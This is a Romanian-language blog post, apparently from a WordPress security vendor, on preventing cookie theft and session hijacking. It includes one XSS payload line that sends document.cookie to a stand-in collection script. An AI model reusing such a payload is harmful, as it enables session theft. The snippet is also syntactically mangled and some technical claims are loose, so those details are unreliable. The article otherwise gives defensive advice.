Cum să preveniți furtul cookie-urilor și sesiunile de deturnare? (Cel mai simplu ghid)

Știați că site-ul dvs. folosește cookie-uri pentru a stoca date confidențiale? Știați că hackerii vă pot fura cu ușurință cookie-urile? Acest lucru ar putea pune în pericol site-ul dvs. și vizitatorii!

Cookie-urile stochează tot felul de informații – de la preferințele de anunțuri ale unui client până la acreditările de conectare și informațiile despre cardul de credit. Cookie-urile sunt folosite pe scară largă pe internet și este înfricoșător cât de des sunt furate.

Dacă sunteți victima furtului de cookie-uri sau a deturnării sesiunii, repercusiunile sunt grave. Nu numai că pierdeți venituri și încrederea vizitatorilor dvs., dar vă puteți confrunta și cu probleme legale și amenzi mari!

Dar să nu vă faceți griji pentru că astăzi, vă vom prezenta tot ce trebuie să știți pentru a preveni aceste atacuri!

În acest ghid, vom afla mai întâi cum hackerii fură cookie-uri, apoi vom parcurge măsurile preventive.

TL;DR : Vă îngrijorați site-ul dvs. WordPress? Vă puteți securiza site-ul chiar acum instalând un plugin de protecție împotriva deturnării sesiunii și furtului cookie-urilor . Acesta vă va scana site-ul în mod regulat și vă va avertiza dacă un hacker injectează vreun cod rău intenționat care îi va permite să fure cookie-uri. Folosind pluginul, puteți curăța rapid hack-ul și puteți evita repercusiunile.

Cuprins

→ Ce este furtul cookie-urilor?

→ Cum folosesc hackerii Cross-site Scripting (XSS) pentru a fura cookie-uri și a deturna sesiunile?

→ Cum să preveniți furtul cookie-urilor și deturnarea sesiunii?

→ Pași pe care vizitatorii site-ului le pot lua împotriva furtului de cookie-uri

Ce este furtul cookie-urilor?

Oricât de mult ne-am dori, furtul de prăjituri nu este la fel de simplu ca un copil care își bagă mâna într-un borcan pentru prăjituri! Este un proces complex și pentru a înțelege ce se întâmplă, trebuie să atingem elementele de bază.

→ Ce este un cookie?

Vă puteți gândi la cookie-uri ca la niște bucăți mici de date. Stochează informații despre interacțiunea dvs. cu un site web. De exemplu, un site de comerț electronic ar dori să urmărească călătoria unui client - produsele căutate, produsele achiziționate, articolele abandonate în coș sau paginile pe care le vizitează.

Acest lucru oferă magazinului informații analitice despre ceea ce preferă clienții, ce pagini sunt vizitate cel mai mult, cât timp stau utilizatorii pe o pagină etc. Ei pot folosi apoi aceste informații pentru a adapta ceea ce este afișat pe site în funcție de preferințele clientului.

Cookie-urile oferă proprietarilor de site-uri web o perspectivă asupra a ceea ce funcționează și a ceea ce nu. Acest lucru îi ajută să determine ce trebuie să schimbe sau să îmbunătățească site-ul lor.

Cookie-urile sunt, de asemenea, folosite pentru a afișa reclame relevante pentru utilizatori. Când vizitați site-uri web, veți observa că sunt afișate reclame.

Aceste anunțuri reflectă de obicei istoricul recent de căutare. De exemplu, dacă ați căutat „laptop-uri” pe Google, veți observa că anunțurile de pe toate site-urile web vă arată anunțuri pentru dell. Aceste reclame nu fac parte din site-ul web, dar sunt gestionate de servicii precum Google Adsense.

Cookie-urile fac lucrurile convenabile atât pentru proprietarul site-ului, cât și pentru utilizator. Poate crește implicarea și poate duce la mai multe vânzări, ceea ce este grozav pentru proprietarii de site-uri web. În ceea ce privește cumpărătorul, cookie-urile îl ajută să obțină o experiență mai personalizată pe un site web sau să vadă reclame mai relevante.

Dar există o mulțime de dezavantaje pe care le vom discuta puțin mai târziu.

[Înapoi sus ↑ ]

→ Ce este o sesiune de browser și un ID de sesiune?

Când vă conectați la un site web, se creează o sesiune între computerul dvs. și acest site web.

De exemplu, când vă conectați la Facebook, începe o sesiune. Acest lucru vă permite să continuați să utilizați Facebook (chiar dacă închideți și redeschideți browserul web) până când faceți clic pe „deconectare” și încheiați sesiunea.

Dacă sesiunea nu a fost creată, va trebui să continuați să vă conectați de fiecare dată când doriți date noi. De exemplu, dacă doriți să părăsiți fluxul de știri Facebook și să vedeți pagina de profil a unui prieten, veți fi deconectat de la Facebook și va trebui să vă introduceți din nou acreditările pentru a vă conecta și a vedea profilul prietenului.

De aceea sunt necesare sesiuni. Vă păstrează conectat, astfel încât să puteți continua să navigați prin diferite pagini web și să navigați pe site.

Ceea ce este important de reținut aici este că fiecare sesiune generează un set de cookie-uri. Putem numi aceste module cookie de sesiune. Și fiecare cookie de sesiune are un ID de sesiune unic.

Un site web folosește acest ID pentru a autentifica utilizatorul și pentru a stabili o conexiune de încredere.

De exemplu, pentru a vă conecta la Facebook, trebuie să vă introduceți numele de utilizator și parola. Apoi, o sesiune este creată cu un ID unic. Orice solicitare pe care o faceți către site-ul Facebook va fi autentificată cu acest ID. Deci, atunci când doriți să vizualizați o altă pagină, veți trimite o solicitare către serverul Facebook pentru a afișa pagina respectivă. Facebook verifică ID-ul și afișează conținutul pe care doriți să-l vedeți.

Acum, hackerii vă pot deturna sesiunea și pot abuza de această conexiune de încredere. Aceștia pot trimite solicitări rău intenționate în numele dvs. Să vedem cum.

[Înapoi sus ↑ ]

→ Care sunt problemele de securitate cu cookie-urile?

Când sunt generate cookie-uri, acestea pot fi vizualizate numai de dvs. – proprietarul site-ului. Niciun alt site web nu vă poate vizualiza cookie-urile. Îți aparțin numai ție.

Dar aceste cookie-uri călătoresc pe internet. Ele sunt utilizate de serviciile publicitare și serviciile de analiză. Așa că aceste cookie-uri trec de la server la server pe tot globul. Dacă conexiunea nu este sigură, un hacker poate intercepta și fura cu ușurință aceste cookie-uri.

Acum, ați putea crede că, dacă un hacker reușește să obțină informații despre preferințele dvs. de cumpărături, mare lucru, nu?

Problema este că cookie-urile stochează mai mult decât informații despre preferințele dvs. de cumpărături. De asemenea, stochează detalii bancare și informații personale, cum ar fi adresa dvs. de expediere și detaliile de contact.

Dacă acest tip de informații cad în mâini greșite, ele pot fi folosite greșit pentru activități frauduloase.

Una dintre cele mai comune moduri prin care hackerii fură cookie-uri este dacă folosesc același wifi ca și tine. Acest tip de hacking wifi se numește atacuri man-in-the-middle și poate avea loc numai dacă ambele sunt conectate la aceeași rețea wireless. Acesta este motivul pentru care se recomandă să nu utilizați niciodată wifi-ul public nesecurizat sau folosit de mulți. Acest lucru se poate întâmpla și utilizatorilor din aceleași rețele de computere.

Alte câteva metode includ sniffing-ul de pachete și exploatarea unei vulnerabilități numită cross-site scripting. Astăzi, vă vom arăta în detaliu cum funcționează furtul cookie-urilor XSS.

[Înapoi sus ↑ ]

Cum folosesc hackerii Cross-site Scripting (XSS) pentru a fura cookie-uri și a deturna sesiunile?

Pentru a vă arăta cum hackerii fură cookie-uri folosind atacuri cross-site scripting (XSS), vom folosi un exemplu. Să presupunem că vizitați un site web care are o secțiune de comentarii.

Orice comentariu pe care îl faceți va fi trimis în baza de date a site-ului. În mod ideal, această secțiune de comentarii ar trebui configurată pentru a accepta doar text în limba engleză simplă. Dar dacă acceptă și caractere speciale, acest lucru îl face vulnerabil la XSS.

Un hacker poate introduce propriile coduri rău intenționate care vor fi trimise în baza de date. Odată înăuntru, codul va fi executat. Există numeroase coduri pe care hackerii le pot introduce pe site pentru a rula tot felul de activități rău intenționate, cum ar fi crearea unui nou administrator de site sau furtul cookie-urilor.

Pentru a fura cookie-uri, un hacker poate introduce următorul cod:

Notă: Acesta nu este un tutorial despre cum să furați cookie-uri. Acest articol are scopul de a face proprietarii de site-uri web conștienți de modul în care hackerii pot fura cookie-uri. Nu vă sfătuim să desfășurați activități ilegale.

[php]

document.write('<img src=& amp;amp;amp;quot;http://localhost/submitcookie.php? cookie ='

+ escape(document.cookie) + '" />);

[/php]

În secțiunea de comentarii, acest cod va apărea ca imagine. Dacă (ca vizitator) faceți clic pe el, veți vedea o imagine afișată. Dar s-a întâmplat mai mult decât pur și simplu.

Când faceți clic pe imagine, acest fișier PHP execută în tăcere codul și preia cookie-ul de sesiune și ID-ul sesiunii.

Acum, hackerul vă poate recrea sesiunea și să pozeze în rolul dvs. pe acel site. Aceștia pot efectua o multitudine de acte rău intenționate. De exemplu, dacă cookie-ul dvs. conține cardul dvs. de credit sau orice alte informații de plată, aceștia pot face achiziții.

Din fericire, există măsuri preventive pentru a proteja proprietarii de site-uri web, precum și vizitatorii acestuia de aceste hack-uri.

[ss_click_to_tweet tweet=”Nu faceți niciodată clic pe linkuri suspecte în secțiunea de comentarii a site-urilor web și în e-mailuri. Ai putea deveni o victimă a furtului de prăjituri.” content="Nu faceți niciodată clic pe linkuri suspecte în secțiunea de comentarii a site-urilor web și în e-mailuri. Ai putea deveni o victimă a furtului de prăjituri.” stil=”implicit”]

[Înapoi sus ↑ ]

Cum să preveniți furtul cookie-urilor și deturnarea sesiunii?

Există două părți care joacă un rol în prevenirea furtului cookie-urilor și a deturnării sesiunii - proprietarul site-ului și vizitatorul. Vom discuta despre măsurile preventive pentru ambele părți.

→ Măsuri pe care proprietarii de site-uri web le pot lua împotriva furtului de cookie-uri

În calitate de proprietar al site-ului web, dacă nu aveți un analist de securitate care să se ocupe de totul pentru dvs., trebuie să implementați următoarele măsuri preventive:

1. Instalați un certificat SSL

Datele sunt transferate constant între browserul utilizatorului și serverul dumneavoastră web. Fără SSL, aceste date (cookie-uri) sunt trimise în text simplu. Dacă un hacker interceptează aceste date, le poate citi pur și simplu. Deci, dacă conține acreditări de conectare, va fi expus.

SSL (Secure Sockets Layer) va cripta datele înainte de a fi transferate. Deci, chiar dacă un hacker reușește să o fure, nu poate citi datele.

Puteți obține un certificat SSL prin intermediul companiei dvs. de găzduire web sau de la un furnizor SSL. De asemenea, puteți obține un certificat SSL de bază gratuit de la Let's Encrypt.

2. Instalați un plugin de securitate

Păstrați un plugin de securitate WordPress , cum ar fi MalCare, activ pe site-ul dvs. Firewall-ul pluginului va preveni tentativele de hack pe site-ul dvs. și va bloca adresele IP rău intenționate. În plus, vă va scana site-ul în mod regulat și vă va avertiza dacă vreun cod rău intenționat a fost introdus de un hacker. Vă puteți curăța site-ul instantaneu. Acest lucru vă va ajuta să detectați și să ștergeți astfel de încercări de hack imediat înainte ca acestea să provoace vreun rău.

3. Actualizați-vă site-ul web

Păstrați-vă întotdeauna site-ul web la zi, aceasta include instalarea WordPress, temele și pluginurile. Rularea cu software învechit deschide multe locuri vulnerabile pe site-ul dvs. pe care hackerii le pot exploata. Asigurați-vă că vă actualizați site-ul pe măsură ce este disponibilă o nouă actualizare.

Aceste actualizări nu numai că oferă noi funcții și remedieri de erori, dar remediază și erori de securitate din când în când.

4. Consolidează-ți site-ul web

WordPress.org recomandă anumite măsuri de consolidare a site-ului web pe care ar trebui să le implementați pe site-ul dvs. Aceasta include utilizarea numelor de utilizator puternice și unice și a parolelor puternice, blocarea execuției PHP în foldere necunoscute, dezactivarea editorului de fișiere în teme și pluginuri și multe altele. Acum, toate acestea vă pot suna ca un jargon, așa că am creat un ghid aprofundat pas cu pas pentru WordPress Hardening pe care îl puteți urma.

[Înapoi sus ↑ ]

Pași pe care vizitatorii site-ului pot face împotriva furtului de cookie-uri

În calitate de vizitator al site-ului web, nu trebuie să aveți încredere orbește că site-urile web au luat măsuri de securitate adecvate. Vă puteți proteja cu următoarele protocoale de securitate web.

1. Instalați un antivirus eficient

Asigurați-vă că dispozitivul pe care îl utilizați pentru a accesa internetul are instalat software anti-malware. Acest lucru vă va alerta dacă este detectat malware atunci când vizitați un site web rău intenționat. De asemenea, va elimina orice malware pe care l-ați putea descărca sau instala accidental pe sistemul dvs.

2. Nu faceți niciodată clic pe Linkuri suspecte

Hackerii vizează utilizatorii prin secțiunea de comentarii de pe site-uri web și prin e-mailuri. Evitați să faceți clic pe link-uri nesigure, în special pe cele care vă atrag cu oferte sau reduceri atractive.

3. Evitați stocarea datelor sensibile

Stocarea informațiilor despre cardul de credit pe site-urile web de cumpărături face ca plata să fie mai rapidă și mai convenabilă. Salvarea parolelor pe browsere web precum Google Chrome pentru a vă conecta automat la site-uri web elimină nevoia de a vă aminti parolele!

Dar totul vine cu un risc mare de a fi furat. Cel mai bine este să nu stocați niciodată date sensibile pe site-uri web. Vă poate economisi câteva secunde, dar vă expune și riscul de a fi atacat.

4. Ștergeți cookie-urile

Puteți șterge cookie-urile în mod regulat pentru a scăpa de orice informații sensibile stocate în browsere precum Google Chrome. Accesați Istoricul > Ștergeți istoricul de navigare. Aici, bifați caseta de selectare „Cookie-uri și alte date ale site-ului”.

Alegeți intervalul de timp „Toate timpul” sau unul conform preferințelor dvs. Apoi, faceți clic pe „Ștergeți datele” și cookie-urile vor fi șterse din istoricul browserului dvs.

Asta ne duce la capăt furtului de prăjituri. Sperăm că acest articol v-a ajutat să înțelegeți mai bine ce se întâmplă exact și cum să îl preveniți.

[ss_click_to_tweet tweet=”Acest ghid de la MalCare m-a ajutat să înțeleg furtul cookie-urilor și cum să iau măsuri preventive împotriva acesteia. Verifică." content=”Acest ghid de la MalCare m-a ajutat să înțeleg furtul cookie-urilor și cum să iau măsuri preventive împotriva acesteia. Verifică." stil=”implicit”]

[Înapoi sus ↑ ]

Gânduri finale

În calitate de proprietar de site, trebuie să luați măsuri de protecție pentru a vă asigura propriile interese, precum și vizitatorii, clienții și clienții. Dar înțelegem că crearea unui site web și gestionarea acestuia este o sarcină grea.

Există un număr nesfârșit de lucruri de care trebuie să aveți grijă, motiv pentru care securitatea WordPress tinde să treacă pe spate de multe ori.

Dar ignorarea aspectului de securitate al site-ului dvs. se poate dovedi a fi dezastruoasă pentru toate celelalte eforturi.

O soluție ușoară, rapidă și eficientă este pluginul de securitate MalCare. Vă puteți gândi la el ca la un agent de securitate pe care îl angajați. Acesta va funcționa non-stop pentru a vă scana în mod regulat site-ul web și pentru a-l proteja de atacuri. Puteți fi siguri că site-ul dvs. este pe mâini sigure.

Păstrați site-ul dvs. WordPress protejat cu MalCare !